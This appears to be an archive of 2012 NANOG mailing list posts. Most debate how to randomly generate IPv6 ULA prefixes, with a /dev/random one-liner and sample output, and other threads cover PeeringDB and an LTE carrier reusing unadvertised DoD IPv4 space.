Cheers, jof From owen at delong.com Wed Jul 18 11:10:52 2012 From: owen at delong.com (Owen DeLong) Date: Wed, 18 Jul 2012 11:10:52 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718134800.GA11320@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> Message-ID: <5DFFC836-6A5B-4185-9873-4449E3784497@delong.com> Sent from my iPad On Jul 18, 2012, at 8:48 AM, Saku Ytti wrote: > On (2012-07-18 08:37 -0500), Stephen Sprunk wrote: > >>> it should bepossible to incorporate RFC2777 verifiability to it. >> >> There is no need for that, since your failure to use a good source of >> randomness hurts nobody except yourself. > > I think you're making fact out of opinion. Maybe SP is generating ULAs for > their customers. Maybe they'd like to be able to prove in case of dispute > that other customer with memorable ULA was not favoured. > Maybe someone claims I'm not using BCP methods for ULA selection, and I'd > like to be able to falsify those claims. > SP should never do that. SP should provide GUA. ULA should be local to the customer and not used between customers unless the customers specifically agree to do so. In that case, the customers can handle the coordination and there is no need for the SP to be involved in any dispute. 
Owen From stephen at sprunk.org Wed Jul 18 11:39:34 2012 From: stephen at sprunk.org (Stephen Sprunk) Date: Wed, 18 Jul 2012 11:39:34 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120718134800.GA11320@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> Message-ID: <5006E6C6.20807@sprunk.org> On 18-Jul-12 08:48, Saku Ytti wrote: > On (2012-07-18 08:37 -0500), Stephen Sprunk wrote: >> There is no need for [RFC2777 verifiability], since your failure to use a good source of randomness hurts nobody except yourself. > > I think you're making fact out of opinion. Maybe SP is generating ULAs for their customers. Why would they do that? SPs should only be assigning (and routing) GUAs. ULAs are for /local/ use within the customer site, so customers can and should generate their own locally. An SP should never see those addresses and can safely ignore their existence, aside from a generic filter on the entire ULA range. > Maybe this is not practical enough concern, but I'm wondering, what is the downside? What is the benefit of recommending method which is not > testable/provable. Those were not considered requirements for the algorithm in RFC 4193 since there is no scenario /where RFC 4193 addresses are a valid solution in the first place/ for which testability or provability of the algorithm's results are important or even useful. S -- Stephen Sprunk "God does not play dice." --Albert Einstein CCIE #3723 "God is an inveterate gambler, and He throws the K5SSS dice at every possible opportunity." --Stephen Hawking -------------- next part -------------- A non-text attachment was scrubbed... 
Name: smime.p7s Type: application/pkcs7-signature Size: 2312 bytes Desc: S/MIME Cryptographic Signature URL: From zaid at zaidali.com Wed Jul 18 11:59:01 2012 From: zaid at zaidali.com (Zaid Ali) Date: Wed, 18 Jul 2012 09:59:01 -0700 Subject: Why use PeeringDB? In-Reply-To: Message-ID: The goal is "Source of truth" for any peer to know information at the Exchange points as well as peering coordinator information. I think it is a great tool for the peering community and definitely useful. Cons: Will it be the next RADB? There needs to be a sustainable community to keep it running since it is a volunteer effort. Zaid On 7/18/12 8:43 AM, "Chris Grundemann" wrote: >Peering Experts, > >I am currently working on a BCOP for IPv6 Peering and Transit and >would very much appreciate some expert information on why using >PeeringDB is a best practice (or why its not). All opinions are >welcome, but be aware that I plan on using the responses to enhance >the document, which will be made publicly available as one of several >(and hopefully many more) BCOPs published at http://www.ipbcop.org/. > >Also, if there are those among you who would like to review the entire >document and perhaps volunteer as a SME to help expand and polish it, >please contact me off-list and I'll get you a current draft. > >Thanks in advance. > >Cheers, >~Chris > >-- >@ChrisGrundemann >http://chrisgrundemann.com > From jof at thejof.com Wed Jul 18 12:24:21 2012 From: jof at thejof.com (Jonathan Lassoff) Date: Wed, 18 Jul 2012 10:24:21 -0700 Subject: Why use PeeringDB? In-Reply-To: References: Message-ID: On Wed, Jul 18, 2012 at 9:59 AM, Zaid Ali wrote: > The goal is "Source of truth" for any peer to know information at the > Exchange points as well as peering coordinator information. I think it is > a great tool for the peering community and definitely useful. Cons: Will > it be the next RADB? There needs to be a sustainable community to keep it > running since it is a volunteer effort. Good point. 
I suspect that enough large users (with money, developers, hosting, etc.) are enjoying it that it has reached a critical mass of a semi-core service that wont have a hard time getting some support going forward. --j From djahandarie at gmail.com Wed Jul 18 12:47:28 2012 From: djahandarie at gmail.com (Darius Jahandarie) Date: Wed, 18 Jul 2012 13:47:28 -0400 Subject: Why use PeeringDB? In-Reply-To: References: Message-ID: On Wed, Jul 18, 2012 at 1:24 PM, Jonathan Lassoff wrote: > Good point. I suspect that enough large users (with money, developers, > hosting, etc.) are enjoying it that it has reached a critical mass of > a semi-core service that wont have a hard time getting some support > going forward. At the moment, I think there are 10-15 volunteers that help handle tickets and such, then 3-4 volunteers that help run the hardware/software. There seems to be good coverage for everything needed, as far as I can tell :). -- Darius Jahandarie From saku at ytti.fi Wed Jul 18 13:07:35 2012 From: saku at ytti.fi (Saku Ytti) Date: Wed, 18 Jul 2012 21:07:35 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <5006E6C6.20807@sprunk.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> Message-ID: <20120718180735.GA11403@pob.ytti.fi> On (2012-07-18 11:39 -0500), Stephen Sprunk wrote: > On 18-Jul-12 08:48, Saku Ytti wrote: > Why would they do that? SPs should only be assigning (and routing) GUAs. Because SP might be tasked to provide network plan for customers L3 MPLS VPN and customer might get INET from different SP and might not want those to be used for L3 MPLS VPN. > ULAs are for /local/ use within the customer site, so customers can and > should generate their own locally. An SP should never see those You make assumption that customer does not buy everything as service. 
RFC1918 is local, yet often IP plan comes as a service from someone who does it for many companies. > Those were not considered requirements for the algorithm in RFC 4193 > since there is no scenario /where RFC 4193 addresses are a valid > solution in the first place/ for which testability or provability of the > algorithm's results are important or even useful. If collision occurs, if dispute occurs, provability that one party did not use BCP method can be useful to solve dispute and decide who renumbers. Other potential problem with RFC, if you have software to generate two, if software runs parallel, it may generate same prefixes. IEEE decided 2008 or 2009 to start allocation OUIs randomly, since some cheapskates were assigning themselves 'free' OUIs from end of the space, confident it'll never collide. So duplicate OUIs can happen. Also some NIC vendors ship with non-unique MAC. What makes RFC method good? Would provability make it worse? Would simply drawing 40b of random from known implementation (openssl?) be worse or better? Random as generated by some known/common implementation wouldn't suffer risk of collisions as described above. -- ++ytti From marka at isc.org Wed Jul 18 19:25:48 2012 From: marka at isc.org (Mark Andrews) Date: Thu, 19 Jul 2012 10:25:48 +1000 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 21:07:35 +0300." <20120718180735.GA11403@pob.ytti.fi> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> Message-ID: <20120719002548.C779D22AE4EE@drugs.dv.isc.org> In message <20120718180735.GA11403 at pob.ytti.fi>, Saku Ytti writes: > On (2012-07-18 11:39 -0500), Stephen Sprunk wrote: > > On 18-Jul-12 08:48, Saku Ytti wrote: > > > Why would they do that? 
SPs should only be assigning (and routing) GUAs. > > Because SP might be tasked to provide network plan for customers L3 MPLS > VPN and customer might get INET from different SP and might not want those > to be used for L3 MPLS VPN. > > > ULAs are for /local/ use within the customer site, so customers can and > > should generate their own locally. An SP should never see those > > You make assumption that customer does not buy everything as service. > RFC1918 is local, yet often IP plan comes as a service from someone who > does it for many companies. > > > Those were not considered requirements for the algorithm in RFC 4193 > > since there is no scenario /where RFC 4193 addresses are a valid > > solution in the first place/ for which testability or provability of the > > algorithm's results are important or even useful. > > If collision occurs, if dispute occurs, provability that one party did not > use BCP method can be useful to solve dispute and decide who renumbers. > Other potential problem with RFC, if you have software to generate two, if > software runs parallel, it may generate same prefixes. > IEEE decided 2008 or 2009 to start allocation OUIs randomly, since some > cheapskates were assigning themselves 'free' OUIs from end of the space, > confident it'll never collide. So duplicate OUIs can happen. Also some NIC > vendors ship with non-unique MAC. > > What makes RFC method good? Would provability make it worse? Would simply > drawing 40b of random from known implementation (openssl?) be worse or > better? Random as generated by some known/common implementation wouldn't > suffer risk of collisions as described above. > > -- > ++ytti The point of the algorithm was to have something which would do a reasonable job in a CPE router without a hardware source of randomness. CPE devices have access to a EUI-64/EUI-48 and often have ntp support or a way of setting the current time. Combining the two gives enough uniqueness. 
Just the EUI-64/EUI-48 should be enough but duplicates have been known to occur so adding in a timestamp accounts for that rare case.

It is a "SAMPLE" routine. It is not "YOU MUST DO IT THIS WAY OR ELSE". Anything that meets the requirements of RFC 4086 is fine. /dev/random on my laptop meets the requirements of RFC 4086. I read 40 bits from /dev/random, converted them to hex and appended them to fd to produce my prefix.

dd bs=5 count=1 if=/dev/random | od -txC | \
awk 'NF == 6 {print "fd" $2 ":" $3 $4 ":" $5 $6}'

and a sample of prefixes generated this way:

fd3d:6385:e4b3
fdf8:462a:6474
fd7b:2bdf:7ed6
fd75:b2b0:9ba2
fd04:4c74:87c0
fd77:948a:2c39
fde5:41f9:95f6
fd00:74a5:e5ad
fd36:827f:ee5f
fd39:d806:5994
fd23:d147:8ff9
fd36:a032:8a09
fde8:6992:d8f9

There is no "I used this method so I win". As long as you choose a random value, using a method that uniformly covers the entire space, you meet the requirements. Toss a coin for each bit. Heads = 1, tails = 0.

Mark
-- 
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: marka at isc.org

From khomyakov.andrey at gmail.com Wed Jul 18 20:24:00 2012
From: khomyakov.andrey at gmail.com (Andrey Khomyakov)
Date: Wed, 18 Jul 2012 21:24:00 -0400
Subject: Another LTE network turns up as IPv4-only squat space + NAT
In-Reply-To: References: Message-ID:

So some "comments" on the intertubes claim that DoD ok'd use of its unadvertised space on private networks. Is there any official reference that may support this statement that anyone of you have seen out there?

--Andrey

From trejrco at gmail.com Wed Jul 18 20:35:59 2012
From: trejrco at gmail.com (TJ)
Date: Wed, 18 Jul 2012 21:35:59 -0400
Subject: Another LTE network turns up as IPv4-only squat space + NAT
In-Reply-To: References: Message-ID:

Even if they did OK it (which I doubt), actually using it - especially in a public/customer facing / visible deployment - is a Bad Idea.
*Traceability fail and possibly creating unreachable networks out there ...* /TJ On Wed, Jul 18, 2012 at 9:24 PM, Andrey Khomyakov < khomyakov.andrey at gmail.com> wrote: > So some "comments" on the intertubes claim that DoD ok'd use of it's > unadvertized space on private networks. Is there any official reference > that may support this statement that anyone of you have seen out there? > > --Andrey > From shortdudey123 at gmail.com Wed Jul 18 20:52:22 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Wed, 18 Jul 2012 20:52:22 -0500 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: I am on sprint and my ip is always in the 20. net even though my wan up is totally different. Grant On Wednesday, July 18, 2012, TJ wrote: > Even if they did OK it (which i doubt), actually using it - especially in a > public/customer facing / visible deployment - is a Bad Idea. > *Traceability fail and possibly creating unreachable networks out there > ...* > > /TJ > > > On Wed, Jul 18, 2012 at 9:24 PM, Andrey Khomyakov < > khomyakov.andrey at gmail.com > wrote: > > > So some "comments" on the intertubes claim that DoD ok'd use of it's > > unadvertized space on private networks. Is there any official reference > > that may support this statement that anyone of you have seen out there? > > > > --Andrey > > > From chuckchurch at gmail.com Wed Jul 18 21:36:31 2012 From: chuckchurch at gmail.com (Chuck Church) Date: Wed, 18 Jul 2012 22:36:31 -0400 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: <009801cd6557$503c6d70$f0b54850$@gmail.com> I disagree. I see it as an extra layer of security. If DOD had a network with address space 'X', obviously it's not advertised to the outside. It never interacts with public network. Having it duplicated on the outside world adds an extra layer of complexity to a hacker trying to access it. It's not a be-all/end-all, but it's a plus. 
A hacker who's partially in the network may try to access network 'X', but it routes to the outside world, tripping IDSs... Chuck -----Original Message----- From: TJ [mailto:trejrco at gmail.com] Sent: Wednesday, July 18, 2012 9:36 PM To: Andrey Khomyakov Cc: Nanog Subject: Re: Another LTE network turns up as IPv4-only squat space + NAT Even if they did OK it (which i doubt), actually using it - especially in a public/customer facing / visible deployment - is a Bad Idea. *Traceability fail and possibly creating unreachable networks out there ...* /TJ On Wed, Jul 18, 2012 at 9:24 PM, Andrey Khomyakov < khomyakov.andrey at gmail.com> wrote: > So some "comments" on the intertubes claim that DoD ok'd use of it's > unadvertized space on private networks. Is there any official > reference that may support this statement that anyone of you have seen out there? > > --Andrey > From ospfisisis at gmail.com Wed Jul 18 21:41:22 2012 From: ospfisisis at gmail.com (Mark Wall) Date: Wed, 18 Jul 2012 22:41:22 -0400 Subject: Clued contact at Brighthouse Message-ID: Anyone have a way to contact brighthouse network that doesn't end up in residential support? Thanks folks From mysidia at gmail.com Wed Jul 18 22:00:43 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Wed, 18 Jul 2012 22:00:43 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <20120719002548.C779D22AE4EE@drugs.dv.isc.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> Message-ID: On 7/18/12, Mark Andrews wrote: [snip] > space, you meet the requirements. Toss a coin for each bit. Heads > = 1, tails = 0. Sure... 
and if someone says they just happened to toss a coin 128 times, and got "0" all 128 times, therefore legitimately assigned ULA ID is all zeros, I don't believe them.

(1 / 2)^128 * ([128 : 128])

for α = 0.0000000002
H_0: fair coin
Observation: 128 heads out of 128 flips (or 128 tails out of 128 flips)

For H_0, Prob given >= 128 heads or >= tails = 2*(1 - Prob(<128) ) = < 0.000000000000000000000000000000000006%

Reject H_0.

Perhaps the world would be well served if the RFC called for routers to apply some [very lenient] randomness tests to the sequence of bits proposed to be configured as a ULA ID.... :)

-- 
-JH

From kauer at biplane.com.au Wed Jul 18 22:57:52 2012
From: kauer at biplane.com.au (Karl Auer)
Date: Thu, 19 Jul 2012 13:57:52 +1000
Subject: using "reserved" IPv6 space
In-Reply-To: 
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org>
Message-ID: <1342670272.6281.646.camel@karl>

On Wed, 2012-07-18 at 22:00 -0500, Jimmy Hess wrote:
> Sure... and if someone says they just happened to toss a coin 128
> times, and got "0" all 128 times, therefore legitimately assigned ULA
> ID is all zeros, I don't believe them.

Um - 40 times, not 128. The first 8 are set, the last 80 are yours to do with as you please, and the remaining 40 should be random.

BUT: The whole idea of ULA is that it is for internal use only. If you want to use 00:0000:0000 as your 40 bits, go for it. Just be aware that you expose yourself to the risk of pain if, somewhere down the track, you need to merge your network with someone else who cleverly chose 00:0000:0000 as well. You can't stop people from making that choice and taking that risk.
You can, however, protect *yourself* by choosing something that is genuinely random and thus minimising the chance that, come the day when you have to merge your network with another (including with someone who chose non-randomly), you will be able to do so relatively painlessly.

I don't understand the professed need for provable randomness. Without a number *space* to provide context, randomness is inherently non-provable. The whole point of the randomness of those 40 bits of ULA infix is that any number is as likely as any other number. Someone, somewhere, is eventually going to get 10:0000:0000, someone else will eventually get 20:0000:0000 and so on. And they are just as likely to get them now as in ten years time.

Because of the likelihood that many people will opt for immediate convenience at the cost of one-day-maybe-never pain, I would suggest that you avoid ULA prefixes that *look* non-random to the naked eye. So if your RNG throws up 00:0000:0001, run it again :-)

Regards, K.

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)
http://www.biplane.com.au/kauer

GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017
Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 230 bytes
Desc: This is a digitally signed message part
URL: 

From marka at isc.org Wed Jul 18 23:17:50 2012
From: marka at isc.org (Mark Andrews)
Date: Thu, 19 Jul 2012 14:17:50 +1000
Subject: using "reserved" IPv6 space
In-Reply-To: Your message of "Wed, 18 Jul 2012 22:00:43 EST."
References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org>
Message-ID: <20120719041750.D30FF22B5846@drugs.dv.isc.org>

In message , Jimmy Hess writes:
> On 7/18/12, Mark Andrews wrote:
> [snip]
> > space, you meet the requirements. Toss a coin for each bit. Heads
> > = 1, tails = 0.
> Sure... and if someone says they just happened to toss a coin 128
> times, and got "0" all 128 times, therefore legitimately assigned ULA
> ID is all zeros, I don't believe them.

Given it is 40 bits not 128 bits the chance of getting all zero/all ones is < 0.000000000001%.

> (1 / 2)^128 * ([128 : 128])
>
> for α = 0.0000000002
> H_0: fair coin
> Observation: 128 heads out of 128 flips (or 128 tails out of 128 flips)
>
> For H_0, Prob given >= 128 heads or >= tails = 2*(1 - Prob(<128) ) =
> < 0.000000000000000000000000000000000006%
>
> Reject H_0.
>
>
> Perhaps the world would be well served if the RFC called for routers to apply
> some [very lenient] randomness tests to the sequence of bits proposed
> to be configured as a ULA ID.... :)

Given there is no such possible test I fail to see how you could expect anyone to implement it. You can't examine a single value to determine if it was randomly chosen or not. Even with multiple values you can't determine if they were randomly or systematically chosen as there are an infinite number of systems that will produce a randomly chosen sequence.
Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mysidia at gmail.com Wed Jul 18 23:40:30 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Wed, 18 Jul 2012 23:40:30 -0500 Subject: using "reserved" IPv6 space In-Reply-To: <1342670272.6281.646.camel@karl> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> Message-ID: On 7/18/12, Karl Auer wrote: > I don't understand the professed need for provable randomness. Without a > number *space* to provide context, randomness is inherently > non-provable. The whole point of the randomness of those 40 bits of ULA > infix is that any number is as likely as any other number. Someone, When numbers are selected by choosing a random value; certain ratios of bits set to "1" are more likely to occur than other ratios of bits set to "1". A random generator that is operating correctly, is much more likely to emit a number with 50% of the bits set to 1, than it is to emit a number with 0% of the bits set to 1, given a sufficient number of bits. If the ratio is inconsistent by a sufficient margin, and your sample of the bits is large enough in number, you can show with high confidence that the number is not random; a 1 in 10 billion chance of the number being randomly generated, would be pretty convincing, for example. Removing the temptation by excluding the small number of choices with 90% - 95% of the bits set to 1 may eliminate future problems caused by an early "accident"/"error" in assigning the initial ULA, compared to the minor inconvenience of needing to run the ULA generator one more time to get an actual usable range. 
> somewhere, is eventually going to get 10:0000:0000, someone else will > eventually get 20:0000:0000 and so on. And they are just as likely to > get them now as in ten years time. That is extremely improbable. If you generate a million ULA IDs a day, every day, it is expected to be over 1000 years before you generate one of those two. -- -JH From kauer at biplane.com.au Thu Jul 19 00:16:33 2012 From: kauer at biplane.com.au (Karl Auer) Date: Thu, 19 Jul 2012 15:16:33 +1000 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> Message-ID: <1342674993.6281.674.camel@karl> On Wed, 2012-07-18 at 23:40 -0500, Jimmy Hess wrote: > When numbers are selected by choosing a random value; certain ratios > of bits set to "1" are more likely to occur than other ratios of bits > set to "1". True. But you cannot tell, from a sample of one number, whether that number was chosen randomly. You can only test it statistically within a series. A particular number may be random in one sequence, non-random in another. > > somewhere, is eventually going to get 10:0000:0000 > That is extremely improbable. Yes. It's just exactly as improbable as *any other prefix* thrown up by your favourite RNG. > If you generate a million ULA IDs a day, every day, it is expected to > be over 1000 years before you generate one of those two. The same is true of *every prefix generated*, yet amazingly, people are generating new, unique random prefixes every day, and each and every one of them was just as improbable. Fancy that! It might be that long before you *expect* to see one, but that doesn't mean you will definitely have to wait that long. 
It could come along tomorrow. That's what "random" means. Let people choose and use whatever ULA prefixes they like. That is the *point* of ULA. If they choose poorly, then they choose poorly - it's no skin off anyone's nose but theirs. If *I* have to choose, I will choose a random prefix, so that in the unlikely event that I have to deal with them, my pain will be minimised. But the best way to win is not to play the game - use PI address space instead of ULA. Regards, K. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Karl Auer (kauer at biplane.com.au) http://www.biplane.com.au/kauer GPG fingerprint: AE1D 4868 6420 AD9A A698 5251 1699 7B78 4EEE 6017 Old fingerprint: DA41 51B1 1481 16E1 F7E2 B2E9 3007 14ED 5736 F687 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 230 bytes Desc: This is a digitally signed message part URL: From saku at ytti.fi Thu Jul 19 02:28:41 2012 From: saku at ytti.fi (Saku Ytti) Date: Thu, 19 Jul 2012 10:28:41 +0300 Subject: using "reserved" IPv6 space In-Reply-To: <20120719002548.C779D22AE4EE@drugs.dv.isc.org> References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> Message-ID: <20120719072841.GA11726@pob.ytti.fi> On (2012-07-19 10:25 +1000), Mark Andrews wrote: > The point of the algorithm was to have something which would do a > reasonable job in a CPE router without a hardware source of randomness. In that context it very much makes sense. > It is a "SAMPLE" routinue. It is not "YOU MUST DO IT THIS WAY OR > ELSE". Anything that meets the requirements of RFC 4086 is fine. > /dev/random on by laptop meets the requirements of RFC 4086. 
Good to know, earlier in this thread, when fully 40b random (method I've been also using, which I've always thought to be superior to RFC) was suggested, it was met with cold shoulder 'does not follow RFC4086 ... do not use'.

I guess I'll keep on using my 40b random instead of 'exactly RFC', and keep verifiability in wish-list.

-- 
++ytti

From saku at ytti.fi Thu Jul 19 02:33:50 2012
From: saku at ytti.fi (Saku Ytti)
Date: Thu, 19 Jul 2012 10:33:50 +0300
Subject: using "reserved" IPv6 space
In-Reply-To: <1342674993.6281.674.camel@karl>
References: <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> <1342674993.6281.674.camel@karl>
Message-ID: <20120719073350.GB11726@pob.ytti.fi>

On (2012-07-19 15:16 +1000), Karl Auer wrote:
> True. But you cannot tell, from a sample of one number, whether that
> number was chosen randomly. You can only test it statistically within a
> series. A particular number may be random in one sequence, non-random in
> another.

RFC2777 deals with this problem to a degree. If you define algorithm and define how to choose seed, then you can later verify that this particular algorithm was used to generate the number.

-- 
++ytti

From mansaxel at besserwisser.org Thu Jul 19 03:50:02 2012
From: mansaxel at besserwisser.org (Måns Nilsson)
Date: Thu, 19 Jul 2012 10:50:02 +0200
Subject: Another LTE network turns up as IPv4-only squat space + NAT
In-Reply-To: <009801cd6557$503c6d70$f0b54850$@gmail.com>
References: <009801cd6557$503c6d70$f0b54850$@gmail.com>
Message-ID: <20120719085002.GI20473@besserwisser.org>

Subject: RE: Another LTE network turns up as IPv4-only squat space + NAT Date: Wed, Jul 18, 2012 at 10:36:31PM -0400 Quoting Chuck Church (chuckchurch at gmail.com):
> I disagree. I see it as an extra layer of security.
> If DOD had a network
> with address space 'X', obviously it's not advertised to the outside. It
> never interacts with public network. Having it duplicated on the outside
> world adds an extra layer of complexity to a hacker trying to access it.
> It's not a be-all/end-all, but it's a plus. A hacker who's partially in the
> network may try to access network 'X', but it routes to the outside world,
> tripping IDSs...

Then DoD should go for using something like the v6 documentation prefix or similar. It both is in many people's filters and (as referenced here recently) is being used for stuff that "never" (promise! or at least not until we change our minds) is going to need connectivity.

I do not see DoD handing back its allocations in the name of promoting unreachability by swapping it for reusable space. It probably values the uniqueness property of allocated space too much. And rightly so.

No, reusing somebody's prefix is A Very Bad Idea. I'm having a very hard time believing the alleged "ok" is anything but cheap talk.

-- 
Måns Nilsson primary/secondary/besserwisser/machina
MN-1334-RIPE +46 705 989668

The Osmonds! You are all Osmonds!! Throwing up on a freeway at dawn!!!

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 198 bytes
Desc: Digital signature
URL: 

From bmanning at vacation.karoshi.com Thu Jul 19 04:41:59 2012
From: bmanning at vacation.karoshi.com (bmanning at vacation.karoshi.com)
Date: Thu, 19 Jul 2012 09:41:59 +0000
Subject: Another LTE network turns up as IPv4-only squat space + NAT
In-Reply-To: <009801cd6557$503c6d70$f0b54850$@gmail.com>
References: <009801cd6557$503c6d70$f0b54850$@gmail.com>
Message-ID: <20120719094159.GA13526@vacation.karoshi.com.>

On Wed, Jul 18, 2012 at 10:36:31PM -0400, Chuck Church wrote:
> I disagree. I see it as an extra layer of security. If DOD had a network
> with address space 'X', obviously it's not advertised to the outside.
It > never interacts with public network. Having it duplicated on the outside ----------------------------------- > world adds an extra layer of complexity to a hacker trying to access it. > It's not a be-all/end-all, but it's a plus. A hacker who's partially in the > network may try to access network 'X', but it routes to the outside world, > tripping IDSs... > > Chuck Never is a -very- long time. That said, -IF- DoD did authorize another party/contractor to utilize some DoD address blocks, its not clear if that LOA would be public. /bill From marka at isc.org Thu Jul 19 07:47:14 2012 From: marka at isc.org (Mark Andrews) Date: Thu, 19 Jul 2012 22:47:14 +1000 Subject: using "reserved" IPv6 space In-Reply-To: Your message of "Wed, 18 Jul 2012 23:40:30 EST." References: <500032E4.40804@gmail.com> <5005E562.8060206@rollernet.us> <5005E87D.6060006@unfix.org> <20120718070405.GA10591@pob.ytti.fi> <5006BC04.1000306@sprunk.org> <20120718134800.GA11320@pob.ytti.fi> <5006E6C6.20807@sprunk.org> <20120718180735.GA11403@pob.ytti.fi> <20120719002548.C779D22AE4EE@drugs.dv.isc.org> <1342670272.6281.646.camel@karl> Message-ID: <20120719124715.B24CB22BDCA1@drugs.dv.isc.org> In message , Jimmy Hess writes: > On 7/18/12, Karl Auer wrote: > > I don't understand the professed need for provable randomness. Without a > > number *space* to provide context, randomness is inherently > > non-provable. The whole point of the randomness of those 40 bits of ULA > > infix is that any number is as likely as any other number. Someone, > > When numbers are selected by choosing a random value; certain ratios > of bits set to "1" are more likely to occur than other ratios of bits > set to "1". > > A random generator that is operating correctly, is much more likely to > emit a number with 50% of the bits set to 1, than it is to emit a > number with 0% of the bits set to 1, given a sufficient number of > bits. 
If the ratio is inconsistent by a sufficient margin, and your > sample of the bits is large enough in number, you can show with high > confidence that the number is not random; a 1 in 10 billion chance > of the number being randomly generated, would be pretty convincing, > for example. Actually you can't. fdaa:aaaa:aaaa has 20/20 0/1 bits but is entirely non random. fdf0:f0f0:f0f0 has 20/20 0/1 bits but is entirely non random. The ratio of the number of bits doesn't tell you anything about whether the number was random or not. > Removing the temptation by excluding the small number of choices with > 90% - 95% of the bits set to 1 may eliminate future problems caused > by an early "accident"/"error" in assigning the initial ULA, > compared to the minor inconvenience of needing to run the ULA > generator one more time to get an actual usable range. > > > somewhere, is eventually going to get 10:0000:0000, someone else will > > eventually get 20:0000:0000 and so on. And they are just as likely to > > get them now as in ten years time. > > That is extremely improbable. > If you generate a million ULA IDs a day, every day, it is expected to > be over 1000 years before you generate one of those two. 
